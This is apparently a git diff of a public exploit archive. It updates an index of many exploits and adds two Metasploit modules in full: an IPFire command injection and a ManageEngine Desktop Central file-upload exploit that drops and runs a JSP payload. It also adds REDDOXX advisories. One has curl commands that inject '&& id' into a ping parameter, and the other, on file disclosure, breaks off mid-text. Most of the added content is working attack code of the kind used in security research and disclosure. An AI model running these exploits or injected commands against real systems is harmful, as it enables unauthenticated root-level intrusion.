diff --git a/files.csv b/files.csv index fd18cfab3..02c939048 100644 --- a/files.csv +++ b/files.csv @@ -3329,7 +3329,7 @@ id,file,description,date,author,platform,type,port 25164,platforms/linux/dos/25164.txt,"Gaim 1.1.3 - File Download Denial of Service",2005-02-25,"Randall Perry",linux,dos,0 25165,platforms/multiple/dos/25165.c,"Stormy Studios KNet 1.x - Remote Buffer Overflow",2005-02-26,Expanders,multiple,dos,0 25171,platforms/multiple/dos/25171.txt,"MercurySteam Scrapland Game Server 1.0 - Remote Denial of Service",2005-02-28,"Luigi Auriemma",multiple,dos,0 -40819,platforms/linux/dos/40819.c,"Linux Kernel 2.6.32-642 /3.16.0-4 - 'inode' Integer Overflow",2016-11-23,"Todor Donev",linux,dos,0 +40819,platforms/linux/dos/40819.c,"Linux Kernel 2.6.32-642/3.16.0-4 - 'inode' Integer Overflow",2016-11-23,"Todor Donev",linux,dos,0 40820,platforms/windows/dos/40820.txt,"UCanCode - Multiple Vulnerabilities",2016-11-23,shinnai,windows,dos,0 25218,platforms/windows/dos/25218.pl,"PlatinumFTPServer 1.0.18 - Multiple Malformed User Name Connection Denial of Service",2005-03-05,ports,windows,dos,0 25219,platforms/windows/dos/25219.txt,"Spinworks Application Server 3.0 - Remote Denial of Service",2005-03-15,dr_insane,windows,dos,0 @@ -5612,6 +5612,14 @@ id,file,description,date,author,platform,type,port 42336,platforms/windows/dos/42336.html,"Microsoft Internet Explorer 11.0.9600.18617 - 'CMarkup::DestroySplayTree' Memory Corruption",2017-07-18,"Google Security Research",windows,dos,0 42337,platforms/windows/dos/42337.html,"Microsoft Internet Explorer 11.1066.14393.0 - VBScript Arithmetic Functions Type Confusion",2017-07-18,"Google Security Research",windows,dos,0 42338,platforms/windows/dos/42338.cpp,"Microsoft Windows Kernel - 'IOCTL 0x120007 (NsiGetParameter)' nsiproxy/netio Pool Memory Disclosure",2017-07-18,"Google Security Research",windows,dos,0 +42360,platforms/multiple/dos/42360.html,"WebKit - 'WebCore::AccessibilityNodeObject::textUnderElement' Use-After-Free",2017-07-24,"Google Security Research",multiple,dos,0 +42361,platforms/multiple/dos/42361.html,"WebKit - 'WebCore::AccessibilityRenderObject::handleAriaExpandedChanged' Use-After-Free",2017-07-24,"Google Security Research",multiple,dos,0 +42362,platforms/multiple/dos/42362.html,"WebKit - 'WebCore::Node::nextSibling' Use-After-Free",2017-07-24,"Google Security Research",multiple,dos,0 +42363,platforms/multiple/dos/42363.html,"WebKit - 'WebCore::RenderSearchField::addSearchResult' Heap Buffer Overflow",2017-07-24,"Google Security Research",multiple,dos,0 +42364,platforms/multiple/dos/42364.html,"WebKit - 'WebCore::InputType::element' Use-After-Free",2017-07-24,"Google Security Research",multiple,dos,0 +42365,platforms/multiple/dos/42365.html,"WebKit - 'WebCore::RenderObject' with Accessibility Enabled Use-After-Free",2017-07-24,"Google Security Research",multiple,dos,0 +42366,platforms/multiple/dos/42366.html,"WebKit - 'WebCore::Node::getFlag' Use-After-Free",2017-07-24,"Google Security Research",multiple,dos,0 +42367,platforms/multiple/dos/42367.html,"WebKit - 'WebCore::getCachedWrapper' Use-After-Free",2017-07-24,"Google Security Research",multiple,dos,0 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0 @@ -8179,7 +8187,7 @@ id,file,description,date,author,platform,type,port 24757,platforms/linux/local/24757.java,"opera Web browser 7.54 java implementation - Multiple Vulnerabilities (3)",2004-11-19,"Marc Schoenefeld",linux,local,0 24758,platforms/linux/local/24758.java,"opera Web browser 7.54 java implementation - Multiple Vulnerabilities (4)",2004-11-19,"Marc Schoenefeld",linux,local,0 24863,platforms/windows/local/24863.html,"EastFTP 4.6.02 - ActiveX Control",2013-03-20,Dr_IDE,windows,local,0 -24872,platforms/windows/local/24872.txt,"Photodex ProShow Gold/Producer 5.0.3310/6.0.3410 - ScsiAccess Privilege Escalation",2013-03-22,"Julien Ahrens",windows,local,0 +24872,platforms/windows/local/24872.txt,"Photodex ProShow Gold/Producer 5.0.3310/6.0.3410 - 'ScsiAccess.exe' Privilege Escalation",2013-03-22,"Julien Ahrens",windows,local,0 24884,platforms/windows/local/24884.html,"LiquidXML Studio 2012 - ActiveX Insecure Method Executable File Creation",2013-03-25,Dr_IDE,windows,local,0 24885,platforms/windows/local/24885.html,"LiquidXML Studio 2010 - ActiveX Remote",2013-03-25,Dr_IDE,windows,local,0 24899,platforms/hardware/local/24899.txt,"Draytek Vigor 3900 1.06 - Privilege Escalation",2013-03-29,"Mohammad abou hayt",hardware,local,0 @@ -8965,8 +8973,8 @@ id,file,description,date,author,platform,type,port 40606,platforms/windows/local/40606.cpp,"Microsoft Windows Edge/Internet Explorer - Isolated Private Namespace Insecure DACL Privilege Escalation (MS16-118)",2016-10-20,"Google Security Research",windows,local,0 40607,platforms/windows/local/40607.cpp,"Microsoft Windows Edge/Internet Explorer - Isolated Private Namespace Insecure Boundary Descriptor Privilege Escalation (MS16-118)",2016-10-20,"Google Security Research",windows,local,0 40608,platforms/windows/local/40608.cs,"Microsoft Windows - NtLoadKeyEx Read Only Hive Arbitrary File Write Privilege Escalation (MS16-124)",2016-10-20,"Google Security Research",windows,local,0 -40611,platforms/linux/local/40611.c,"Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' /proc/self/mem Race Condition (PoC) (Write Access)",2016-10-19,"Phil Oester",linux,local,0 -40616,platforms/linux/local/40616.c,"Linux Kernel 2.6.22 < 3.9 (x86/x64) - 'Dirty COW' /proc/self/mem Race Condition Privilege Escalation (SUID)",2016-10-21,"Robin Verton",linux,local,0 +40611,platforms/linux/local/40611.c,"Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' /proc/self/mem Race Condition (PoC) (Write Access Method)",2016-10-19,"Phil Oester",linux,local,0 +40616,platforms/linux/local/40616.c,"Linux Kernel 2.6.22 < 3.9 (x86/x64) - 'Dirty COW' '/proc/self/mem' Race Condition Privilege Escalation (SUID Method)",2016-10-21,"Robin Verton",linux,local,0 40627,platforms/win_x86/local/40627.c,"Microsoft Windows (x86) - 'NDISTAPI' Privilege Escalation (MS11-062)",2016-10-24,"Tomislav Paskalev",win_x86,local,0 40630,platforms/windows/local/40630.py,"Network Scanner 4.0.0 - Local Buffer Overflow (SEH)",2016-10-25,n30m1nd,windows,local,0 40634,platforms/linux/local/40634.py,"GNU GTypist 2.9.5-2 - Local Buffer Overflow",2016-10-27,"Juan Sacco",linux,local,0 @@ -8980,7 +8988,7 @@ id,file,description,date,author,platform,type,port 40688,platforms/linux/local/40688.rb,"Linux Kernel (Ubuntu / Fedora / RedHat) - 'Overlayfs' Privilege Escalation (Metasploit)",2016-11-02,Metasploit,linux,local,0 40679,platforms/linux/local/40679.sh,"MySQL / MariaDB / PerconaDB 5.5.x/5.6.x/5.7.x - ('root' System User) Privilege Escalation",2016-11-01,"Dawid Golunski",linux,local,0 40710,platforms/aix/local/40710.sh,"IBM AIX 5.3/6.1/7.1/7.2 - 'lquerylv' Privilege Escalation",2016-11-04,"Hector X. Monsegur",aix,local,0 -40838,platforms/linux/local/40838.c,"Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' PTRACE_POKEDATA Race Condition (PoC) (Write Access)",2016-10-26,"Phil Oester",linux,local,0 +40838,platforms/linux/local/40838.c,"Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition (PoC) (Write Access Method)",2016-10-26,"Phil Oester",linux,local,0 40759,platforms/linux/local/40759.rb,"Linux Kernel 4.4 (Ubuntu 16.04) - 'BPF' Privilege Escalation (Metasploit)",2016-11-14,Metasploit,linux,local,0 40741,platforms/windows/local/40741.py,"Avira Antivirus 15.0.21.86 - '.zip' Directory Traversal / Command Execution",2016-11-08,R-73eN,windows,local,0 40765,platforms/windows/local/40765.cs,"Microsoft Windows - VHDMP Arbitrary Physical Disk Cloning Privilege Escalation (MS16-138)",2016-11-15,"Google Security Research",windows,local,0 @@ -8990,8 +8998,8 @@ id,file,description,date,author,platform,type,port 40810,platforms/linux/local/40810.c,"Linux Kernel 2.6.18 - 'move_pages()' Information Leak",2010-02-08,spender,linux,local,0 40811,platforms/lin_x86-64/local/40811.c,"Linux Kernel 2.6.32-rc1 (x86-64) - Register Leak",2009-10-04,spender,lin_x86-64,local,0 40812,platforms/linux/local/40812.c,"Linux Kernel 2.6.10 < 2.6.31.5 - 'pipe.c' Privilege Escalation",2013-12-16,spender,linux,local,0 -40839,platforms/linux/local/40839.c,"Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' PTRACE_POKEDATA Race Condition Privilege Escalation (/etc/passwd)",2016-11-28,FireFart,linux,local,0 -40847,platforms/linux/local/40847.cpp,"Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' /proc/self/mem Race Condition Privilege Escalation (/etc/passwd)",2016-11-27,"Gabriele Bonacini",linux,local,0 +40839,platforms/linux/local/40839.c,"Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation (/etc/passwd Method)",2016-11-28,FireFart,linux,local,0 +40847,platforms/linux/local/40847.cpp,"Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' '/proc/self/mem' Race Condition Privilege Escalation (/etc/passwd Method)",2016-11-27,"Gabriele Bonacini",linux,local,0 40848,platforms/windows/local/40848.java,"WinPower 4.9.0.4 - Privilege Escalation",2016-11-29,"Kacper Szurek",windows,local,0 40859,platforms/windows/local/40859.txt,"Microsoft Authorization Manager 6.1.7601 - 'azman' XML External Entity Injection",2016-12-04,hyp3rlinx,windows,local,0 40860,platforms/windows/local/40860.txt,"Microsoft Excel Starter 2010 - XML External Entity Injection",2016-12-04,hyp3rlinx,windows,local,0 @@ -9137,6 +9145,8 @@ id,file,description,date,author,platform,type,port 42310,platforms/windows/local/42310.txt,"Pelco VideoXpert 1.12.105 - Privilege Escalation",2017-07-10,LiquidWorm,windows,local,0 42325,platforms/windows/local/42325.py,"Counter Strike: Condition Zero - '.BSP' Map File Code Execution",2017-07-07,"Grant Hernandez",windows,local,0 42334,platforms/macos/local/42334.txt,"Hashicorp vagrant-vmware-fusion < 4.0.20 - Local Root Privilege Escalation",2017-07-18,"Mark Wadham",macos,local,0 +42357,platforms/linux/local/42357.py,"MAWK 1.3.3-17 - Local Buffer Overflow",2017-07-24,"Juan Sacco",linux,local,0 +42368,platforms/win_x86-64/local/42368.rb,"Razer Synapse 2.20.15.1104 - rzpnk.sys ZwOpenProcess (Metasploit)",2017-07-24,Metasploit,win_x86-64,local,0 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139 @@ -15684,6 +15694,9 @@ id,file,description,date,author,platform,type,port 42327,platforms/windows/remote/42327.html,"Firefox 50.0.1 - ASM.JS JIT-Spray Remote Code Execution",2017-07-14,Rh0,windows,remote,0 42328,platforms/windows/remote/42328.py,"FTPGetter 5.89.0.85 - Buffer Overflow (SEH)",2017-07-14,"Paul Purcell",windows,remote,0 42331,platforms/hardware/remote/42331.txt,"Belkin NetCam F7D7601 - Multiple Vulnerabilities",2017-07-17,Wadeek,hardware,remote,0 +42354,platforms/windows/remote/42354.html,"Microsoft Internet Explorer - 'mshtml.dll' Remote Code Execution (MS17-007)",2017-07-24,"Mohamed Hamdy",windows,remote,0 +42369,platforms/cgi/remote/42369.rb,"IPFire < 2.19 Update Core 110 - Remote Code Execution (Metasploit)",2017-07-24,Metasploit,cgi,remote,0 +42370,platforms/unix/remote/42370.rb,"VICIdial 2.9 RC 1 to 2.13 RC1 - user_authorization Unauthenticated Command Execution (Metasploit)",2017-07-24,Metasploit,unix,remote,0 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) + execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0 13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0 @@ -38157,3 +38170,7 @@ id,file,description,date,author,platform,type,port 42347,platforms/php/webapps/42347.txt,"Joomla! Component JoomRecipe 1.0.4 - 'search_author' Parameter SQL Injection",2017-07-20,Teng,php,webapps,0 42351,platforms/php/webapps/42351.txt,"WordPress Plugin IBPS Online Exam 1.0 - SQL Injection / Cross-Site Scripting",2017-07-20,8bitsec,php,webapps,0 42353,platforms/php/webapps/42353.txt,"NEC UNIVERGE UM4730 < 11.8 - SQL Injection",2017-07-21,b0x41s,php,webapps,0 +42358,platforms/java/webapps/42358.rb,"ManageEngine Desktop Central 10 Build 100087 - Remote Code Execution (Metasploit)",2017-07-24,"Kacper Szurek",java,webapps,0 +42359,platforms/php/webapps/42359.txt,"PaulShop - SQL Injection / Cross-Site Scripting",2017-07-24,"BTIS Team",php,webapps,0 +42371,platforms/json/webapps/42371.txt,"REDDOXX Appliance Build 2032 / 2.0.625 - Remote Command Execution",2017-07-24,"RedTeam Pentesting",json,webapps,0 +42372,platforms/json/webapps/42372.txt,"REDDOXX Appliance Build 2032 / 2.0.625 - Arbitrary File Disclosure",2017-07-24,"RedTeam Pentesting",json,webapps,0 diff --git a/platforms/cgi/remote/42369.rb b/platforms/cgi/remote/42369.rb new file mode 100755 index 000000000..4ce01c788 --- /dev/null +++ b/platforms/cgi/remote/42369.rb @@ -0,0 +1,119 @@ +## +## This module requires Metasploit: https://metasploit.com/download +## Current source: https://github.com/rapid7/metasploit-framework +### + +class MetasploitModule < Msf::Exploit::Remote + include Msf::Exploit::Remote::HttpClient + + Rank = ExcellentRanking + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'IPFire proxy.cgi RCE', + 'Description' => %q( + IPFire, a free linux based open source firewall distribution, + version < 2.19 Update Core 110 contains a remote command execution + vulnerability in the ids.cgi page in the OINKCODE field. + ), + 'Author' => + [ + 'h00die ', # module + '0x09AL' # discovery + ], + 'References' => + [ + [ 'EDB', '42149' ] + ], + 'License' => MSF_LICENSE, + 'Platform' => 'unix', + 'Privileged' => false, + 'DefaultOptions' => { 'SSL' => true }, + 'Arch' => [ ARCH_CMD ], + 'Payload' => + { + 'Compat' => + { + 'PayloadType' => 'cmd', + 'RequiredCmd' => 'perl awk openssl' + } + }, + 'Targets' => + [ + [ 'Automatic Target', {}] + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Jun 09 2017' + ) + ) + + register_options( + [ + OptString.new('USERNAME', [ true, 'User to login with', 'admin']), + OptString.new('PASSWORD', [ false, 'Password to login with', '']), + Opt::RPORT(444) + ] + ) + end + + def check + begin + # authorization header required, see https://github.com/rapid7/metasploit-framework/pull/6433#r56764179 + # after a chat with @bcoles in IRC. + res = send_request_cgi( + 'uri' => '/cgi-bin/pakfire.cgi', + 'method' => 'GET', + 'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']) + ) + + if res && res.code == 200 + /\IPFire (?[\d.]{4}) \([\w]+\) - Core Update (?[\d]+)/ =~ res.body + end + if version.nil? || update.nil? || !Gem::Version.correct?(version) + vprint_error('No Recognizable Version Found') + CheckCode::Safe + elsif Gem::Version.new(version) <= Gem::Version.new('2.19') && update.to_i <= 110 + CheckCode::Appears + else + vprint_error('Version and/or Update Not Supported') + CheckCode::Safe + end + rescue ::Rex::ConnectionError + print_error("Connection Failed") + CheckCode::Safe + end + end + + def exploit + begin + # authorization header required, see https://github.com/rapid7/metasploit-framework/pull/6433#r56764179 + # after a chat with @bcoles in IRC. + vprint_status('Sending request') + res = send_request_cgi( + 'uri' => '/cgi-bin/ids.cgi', + 'method' => 'POST', + 'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']), + 'headers' => + { + 'Referer' => "#{datastore['SSL'] ? 'https' : 'http'}://#{datastore['RHOST']}:#{datastore['RPORT']}/cgi-bin/ids.cgi" + }, + 'vars_post' => { + 'ENABLE_SNORT_GREEN' => 'on', + 'ENABLE_SNORT' => 'on', + 'RULES' => 'registered', + 'OINKCODE' => "`#{payload.encoded}`", + 'ACTION' => 'Download new ruleset', + 'ACTION2' => 'snort' + } + ) + + # success means we hang our session, and wont get back a response, so just check we get a response back + if res && res.code != 200 + fail_with(Failure::UnexpectedReply, "#{peer} - Invalid credentials (response code: #{res.code})") + end + rescue ::Rex::ConnectionError + fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service") + end + end +end \ No newline at end of file diff --git a/platforms/java/webapps/42358.rb b/platforms/java/webapps/42358.rb new file mode 100755 index 000000000..ddde1273b --- /dev/null +++ b/platforms/java/webapps/42358.rb @@ -0,0 +1,230 @@ +# Exploit Title: ManageEngine Desktop Central 10 Build 100087 RCE +# Date: 24-07-2017 +# Software Link: https://www.manageengine.com/products/desktop-central/ +# Exploit Author: Kacper Szurek +# Contact: https://twitter.com/KacperSzurek +# Website: https://security.szurek.pl/ +# CVE: CVE-2017-11346 +# Category: remote + +1. Description + +When uploading a file, the `FileUploadServlet` class does not check the user-controlled `fileName` parameter using `hasVulnerabilityInFileName` function. + +This allows a remote attacker to create a malicious file and place it under a directory that allows server-side scripts to run, which results in remote code execution under the context of SYSTEM. + +https://security.szurek.pl/manageengine-desktop-central-10-build-100087-rce.html + +2. Proof of Concept + +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' +require 'nokogiri' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::EXE + include Msf::Exploit::FileDropper + + def initialize(info={}) + super(update_info(info, + 'Name' => "ManageEngine Desktop Central 10 FileUploadServlet fileName RCE Vulnerability", + 'Description' => %q{ + This module exploits a vulnerability found in ManageEngine Desktop Central 10. When + uploading a file, the FileUploadServlet class does not check the user-controlled + fileName parameter. This allows a remote attacker to create a malicious file and place + it under a directory that allows server-side scripts to run, + which results in remote code execution under the context of SYSTEM. + + This exploit was successfully tested on version 10, build 100087. + + Exploit code based on https://www.exploit-db.com/exploits/38982/ + }, + 'License' => MSF_LICENSE, + 'Author' => [ 'Kacper Szurek' ], + 'References' => + [ + [ 'URL', 'https://security.szurek.pl/manageengine-desktop-central-10-build-100087-rce.html' ] + ], + 'Platform' => 'win', + 'Targets' => + [ + [ 'ManageEngine Desktop Central 10 on Windows', {} ] + ], + 'Payload' => + { + 'BadChars' => "\x00" + }, + 'Privileged' => false, + 'DisclosureDate' => "July 24 2017", + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('TARGETURI', [true, 'The base path for ManageEngine Desktop Central', '/']), + Opt::RPORT(8020) + ], self.class) + end + + def jsp_drop_bin(bin_data, output_file) + jspraw = %Q|<%@ page import="java.io.*" %>\n| + jspraw << %Q|<%\n| + jspraw << %Q|String data = "#{Rex::Text.to_hex(bin_data, "")}";\n| + + jspraw << %Q|FileOutputStream outputstream = new FileOutputStream("#{output_file}");\n| + + jspraw << %Q|int numbytes = data.length();\n| + + jspraw << %Q|byte[] bytes = new byte[numbytes/2];\n| + jspraw << %Q|for (int counter = 0; counter < numbytes; counter += 2)\n| + jspraw << %Q|{\n| + jspraw << %Q| char char1 = (char) data.charAt(counter);\n| + jspraw << %Q| char char2 = (char) data.charAt(counter + 1);\n| + jspraw << %Q| int comb = Character.digit(char1, 16) & 0xff;\n| + jspraw << %Q| comb <<= 4;\n| + jspraw << %Q| comb += Character.digit(char2, 16) & 0xff;\n| + jspraw << %Q| bytes[counter/2] = (byte)comb;\n| + jspraw << %Q|}\n| + + jspraw << %Q|outputstream.write(bytes);\n| + jspraw << %Q|outputstream.close();\n| + jspraw << %Q|%>\n| + + jspraw + end + + def jsp_execute_command(command) + jspraw = %Q|<%@ page import="java.io.*" %>\n| + jspraw << %Q|<%\n| + jspraw << %Q|try {\n| + jspraw << %Q| Runtime.getRuntime().exec("chmod +x #{command}");\n| + jspraw << %Q|} catch (IOException ioe) { }\n| + jspraw << %Q|Runtime.getRuntime().exec("#{command}");\n| + jspraw << %Q|%>\n| + + jspraw + end + + def get_jsp_stager + exe = generate_payload_exe(code: payload.encoded) + jsp_fname = "#{Rex::Text.rand_text_alpha(5)}.jsp" + + register_files_for_cleanup("../webapps/DesktopCentral/jspf/#{jsp_fname}") + + { + jsp_payload: jsp_drop_bin(exe, jsp_fname) + jsp_execute_command(jsp_fname), + jsp_name: jsp_fname + } + end + + def get_build_number(res) + inputs = res.get_hidden_inputs + inputs.first['buildNum'] + end + + def get_html_title(res) + html = res.body + n = ::Nokogiri::HTML(html) + x = n.xpath('//title').text + end + + def check + uri = normalize_uri(target_uri.path, '/configurations.do') + + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => uri + }) + + unless res + print_error("Connection timed out") + return Exploit::CheckCode::Unknown + end + + build_number = get_build_number(res) + if build_number.to_s.empty? + print_error("Cannot find build number") + else + print_status("Found build number: #{build_number}") + end + + html_title = get_html_title(res) + + if html_title.to_s.empty? + print_error("Cannot find title") + else + print_status("Found title: #{html_title}") + end + + if build_number.to_i <= 100087 + return Exploit::CheckCode::Appears + elsif /ManageEngine Desktop Central 10/ === html_title + return Exploit::CheckCode::Detected + end + + + Exploit::CheckCode::Safe + end + + def upload_jsp(stager_info) + uri = normalize_uri(target_uri.path, 'fileupload') + + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => uri, + 'ctype' => 'application/octet-stream', + 'encode_params' => false, + 'data' => stager_info[:jsp_payload], + 'vars_get' => { + 'action' => 'HelpDesk_video', + 'computerName' => Rex::Text.rand_text_alpha(rand(10)+5), + 'resourceId' => 1, + 'customerId' => 1, + 'fileName' => "\\..\\..\\..\\..\\jspf\\#{stager_info[:jsp_name]}" + } + }) + + if res.nil? + fail_with(Failure::Unknown, "Connection timed out while uploading to #{uri}") + elsif res && res.code != 200 + fail_with(Failure::Unknown, "The server returned #{res.code}, but 200 was expected.") + end + end + + def exec_jsp(stager_info) + uri = normalize_uri(target_uri.path, "/jspf/#{stager_info[:jsp_name]}") + + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => uri + }) + + if res.nil? + fail_with(Failure::Unknown, "Connection timed out while executing #{uri}") + elsif res && res.code != 200 + fail_with(Failure::Unknown, "Failed to execute #{uri}. Server returned #{res.code}") + end + end + + def exploit + print_status("Creating JSP stager") + stager_info = get_jsp_stager + + print_status("Uploading JSP stager #{stager_info[:jsp_name]}...") + upload_jsp(stager_info) + + print_status("Executing stager...") + exec_jsp(stager_info) + end + +end + +3. Solution: + +https://www.manageengine.com/products/desktop-central/remote-code-execution.html \ No newline at end of file diff --git a/platforms/json/webapps/42371.txt b/platforms/json/webapps/42371.txt new file mode 100755 index 000000000..d9ef8fce0 --- /dev/null +++ b/platforms/json/webapps/42371.txt @@ -0,0 +1,187 @@ +Advisory: Remote Command Execution as root in REDDOXX Appliance + +RedTeam Pentesting discovered a remote command execution vulnerability +in the REDDOXX appliance software, which allows attackers to execute +arbitrary command with root privileges while unauthenticated. + +Details +======= + +Product: REDDOXX Appliance +Affected Versions: <= Build 2032 / v2.0.625 +Fixed Versions: Version 2032 SP2 +Vulnerability Type: Remote Command Execution +Security Risk: high +Vendor URL: https://www.reddoxx.com/ +Vendor Status: patch available +Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2017-009 +Advisory Status: published +CVE: GENERIC-MAP-NOMATCH +CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH + +Introduction +============ + +"REDDOXX is a leading supplier of solutions for e-mail archiving, +encrypted and digitally signed e-mail traffic as well as spam +protection. Our focus is on technological innovation: taking our cue +from our clientsâ?? requirements our competent and quality-conscious +employees strive to offer you the best possible products at all times. +Using stringent quality standards and proven processes we keep +developing our company and products continuously, with the goal of +continuous improvement." + +(from the vendor's homepage) + +More Details +============ + +The administrative interface of the REDDOXX appliance [0] offers several +diagnostic tools in the "Diagnostic Center". Ping is one of these tools. +The interface for this tool contains two input fields, which allow users +to specify a target host and a packet count. Through the ISO provided on +the vendor's homepage [1], it was possible to analyze how these commands +are embedded into the command-line of the ping command: + +------------------------------------------------------------------------ + +function ExecuteDiag($parameter) +{ +// Here we do the main thing ... +$cmd = "ping '" . $parameter->targetHost . "' -c " . $parameter->count; + +$this->PrintHeader(); +$this->PrintHeadLine(array('Result Message', 'Status')); +$this->PrintOut(""); + +$this->PrintOut("
");
+passthru($cmd, $rc);
+$this->PrintOut("
"); + +$this->PrintStatus($rc); +$this->PrintOut(""); +$this->PrintEnd(); + +$result = new stdClass; +$result->ResultCode = $rc; +$result->MessageText = ""; + +$this->SaveResult($result); +} +------------------------------------------------------------------------ + +As can be seen in the listing above, the parameters are embedded into a +string stored in the variable $cmd. The target host parameter is +surrounded with single quotes, while the count parameter is not. + +Before the parameters are actually embedded into the ping command-line +however, the following function performs a check for "illegal +characters": + +------------------------------------------------------------------------ + +public static function CheckShellParameter($parameter, $key = "") +{ +if (!is_array($parameter)) +$parameter = array($parameter); + +foreach ($parameter as $value) { +if (preg_match("/[';<>\"]/", $value)) { +$paramNameMsg = ""; +if ($key) +$paramNameMsg = " in parameter '$key'"; +throw new Exception("Invalid value" . $paramNameMsg . ". Illegal characters found.", 1); +} +} +} +------------------------------------------------------------------------ + +These are characters, which can be used to append additional commands to +the command line. While this check prevents certain kinds of attacks, it +is incomplete and can therefore be bypassed. For example, && (AND) and +|| (OR) operators can still be used to append additional commands to the +command-line. Submitting a count target host of "127.0.0.1" and a count +of "1 || id" leads to the following command-line being passed to the PHP +passthru() function and executed: + +------------------------------------------------------------------------ + +ping '127.0.0.1' -c 1 || id +------------------------------------------------------------------------ + +This causes the command "id" to be executed after the execution of the +ping command is completed. + +Proof of Concept +================ + +The following curl command-lines can be used to trigger the +vulnerability. + +First, the diagnose function ping is called as follows: + +------------------------------------------------------------------------ + +$ curl -H 'Content-Type: application/json' --data '{"Name":"Ping",''"Parameter":{"targetHost":"127.0.0.1","count":"1''&& echo 'REDTEAM_MARKER_START' && id && echo 'REDTEAM_MARKER_END'"}}' http://www.example.com/api/v1/rws/diagnose/start +------------------------------------------------------------------------ + +Here, the count parameter "1 && echo 'REDTEAM_MARKER_START' && id && echo +'REDTEAM_MARKER_END'" is submitted. The two echo commands with markers are +only used to distinguish the output of the "id" command in the final +result, which can be retrieved and displayed using the following curl +command-line: + +------------------------------------------------------------------------ + +$ curl --silent -H 'Accept: application/json' http://www.example.com/api/v1/rws/diagnose/result/Ping | jq .Output | sed 's;.*REDTEAM_MARKER_START\\n\(.*\)\\nREDTEAM_MARKER_END.*;\1;' | sed 's/\\n/\n/g' +uid=0(root) gid=0(root) groups=0(root) +------------------------------------------------------------------------ + +Workaround +========== + +None + +Fix +=== + +Update the appliance software to Version 2032 SP2. + +Security Risk +============= + +The diagnostic functions offered by the REDDOXX appliance allow attackers +to execute arbitrary commands. Since the commands are executed with root +privileges and no authentication is required, this is rated as a high +risk. + +Timeline +======== + +2017-05-17 Vulnerability identified +2017-05-23 Customer approved disclosure of vulnerability +2017-05-26 Customer provided details of vulnerability to vendor +2017-07-20 Vulnerability reported as fixed by vendor +2017-07-24 Advisory released + +References +========== + +[0] https://www.reddoxx.com/en/ +[1] https://my.reddoxx.com/documents/manual/en/custdl/product-downloads +(Requires login) + +RedTeam Pentesting GmbH +======================= + +RedTeam Pentesting offers individual penetration tests performed by a +team of specialised IT-security experts. Hereby, security weaknesses in +company networks or products are uncovered and can be fixed immediately. + +As there are only few experts in this field, RedTeam Pentesting wants to +share its knowledge and enhance the public knowledge with research in +security-related areas. The results are made available as public +security advisories. + +More information about RedTeam Pentesting can be found at: +https://www.redteam-pentesting.de/ diff --git a/platforms/json/webapps/42372.txt b/platforms/json/webapps/42372.txt new file mode 100755 index 000000000..6ae792716 --- /dev/null +++ b/platforms/json/webapps/42372.txt @@ -0,0 +1,261 @@ +Advisory: Arbitrary File Disclosure with root Privileges via RdxEngine-API in REDDOXX Appliance + +RedTeam Pentesting discovered an arbitrary file disclosure vulnerability +in the REDDOXX appliance software, which allows unauthenticated +attackers to list directory contents and download arbitrary files from +the affected system with root permissions. + +Details +======= + +Product: REDDOXX Appliance +Affected Versions: Build 2032 / v2.0.625, older versions likely affected too +Fixed Versions: Version 2032 SP2 +Vulnerability Type: Arbitrary File Disclosure +Security Risk: high +Vendor URL: https://www.reddoxx.com/ +Vendor Status: patch available +Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2017-006 +Advisory Status: published +CVE: GENERIC-MAP-NOMATCH +CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH + +Introduction +============ + +"REDDOXX is a leading supplier of solutions for e-mail archiving, +encrypted and digitally signed e-mail traffic as well as spam +protection. Our focus is on technological innovation: taking our cue +from our clientsâ?? requirements our competent and quality-conscious +employees strive to offer you the best possible products at all times. +Using stringent quality standards and proven processes we keep +developing our company and products continuously, with the goal of +continuous improvement." + +(from the vendor's homepage) + +More Details +============ + +When using the user frontend of the 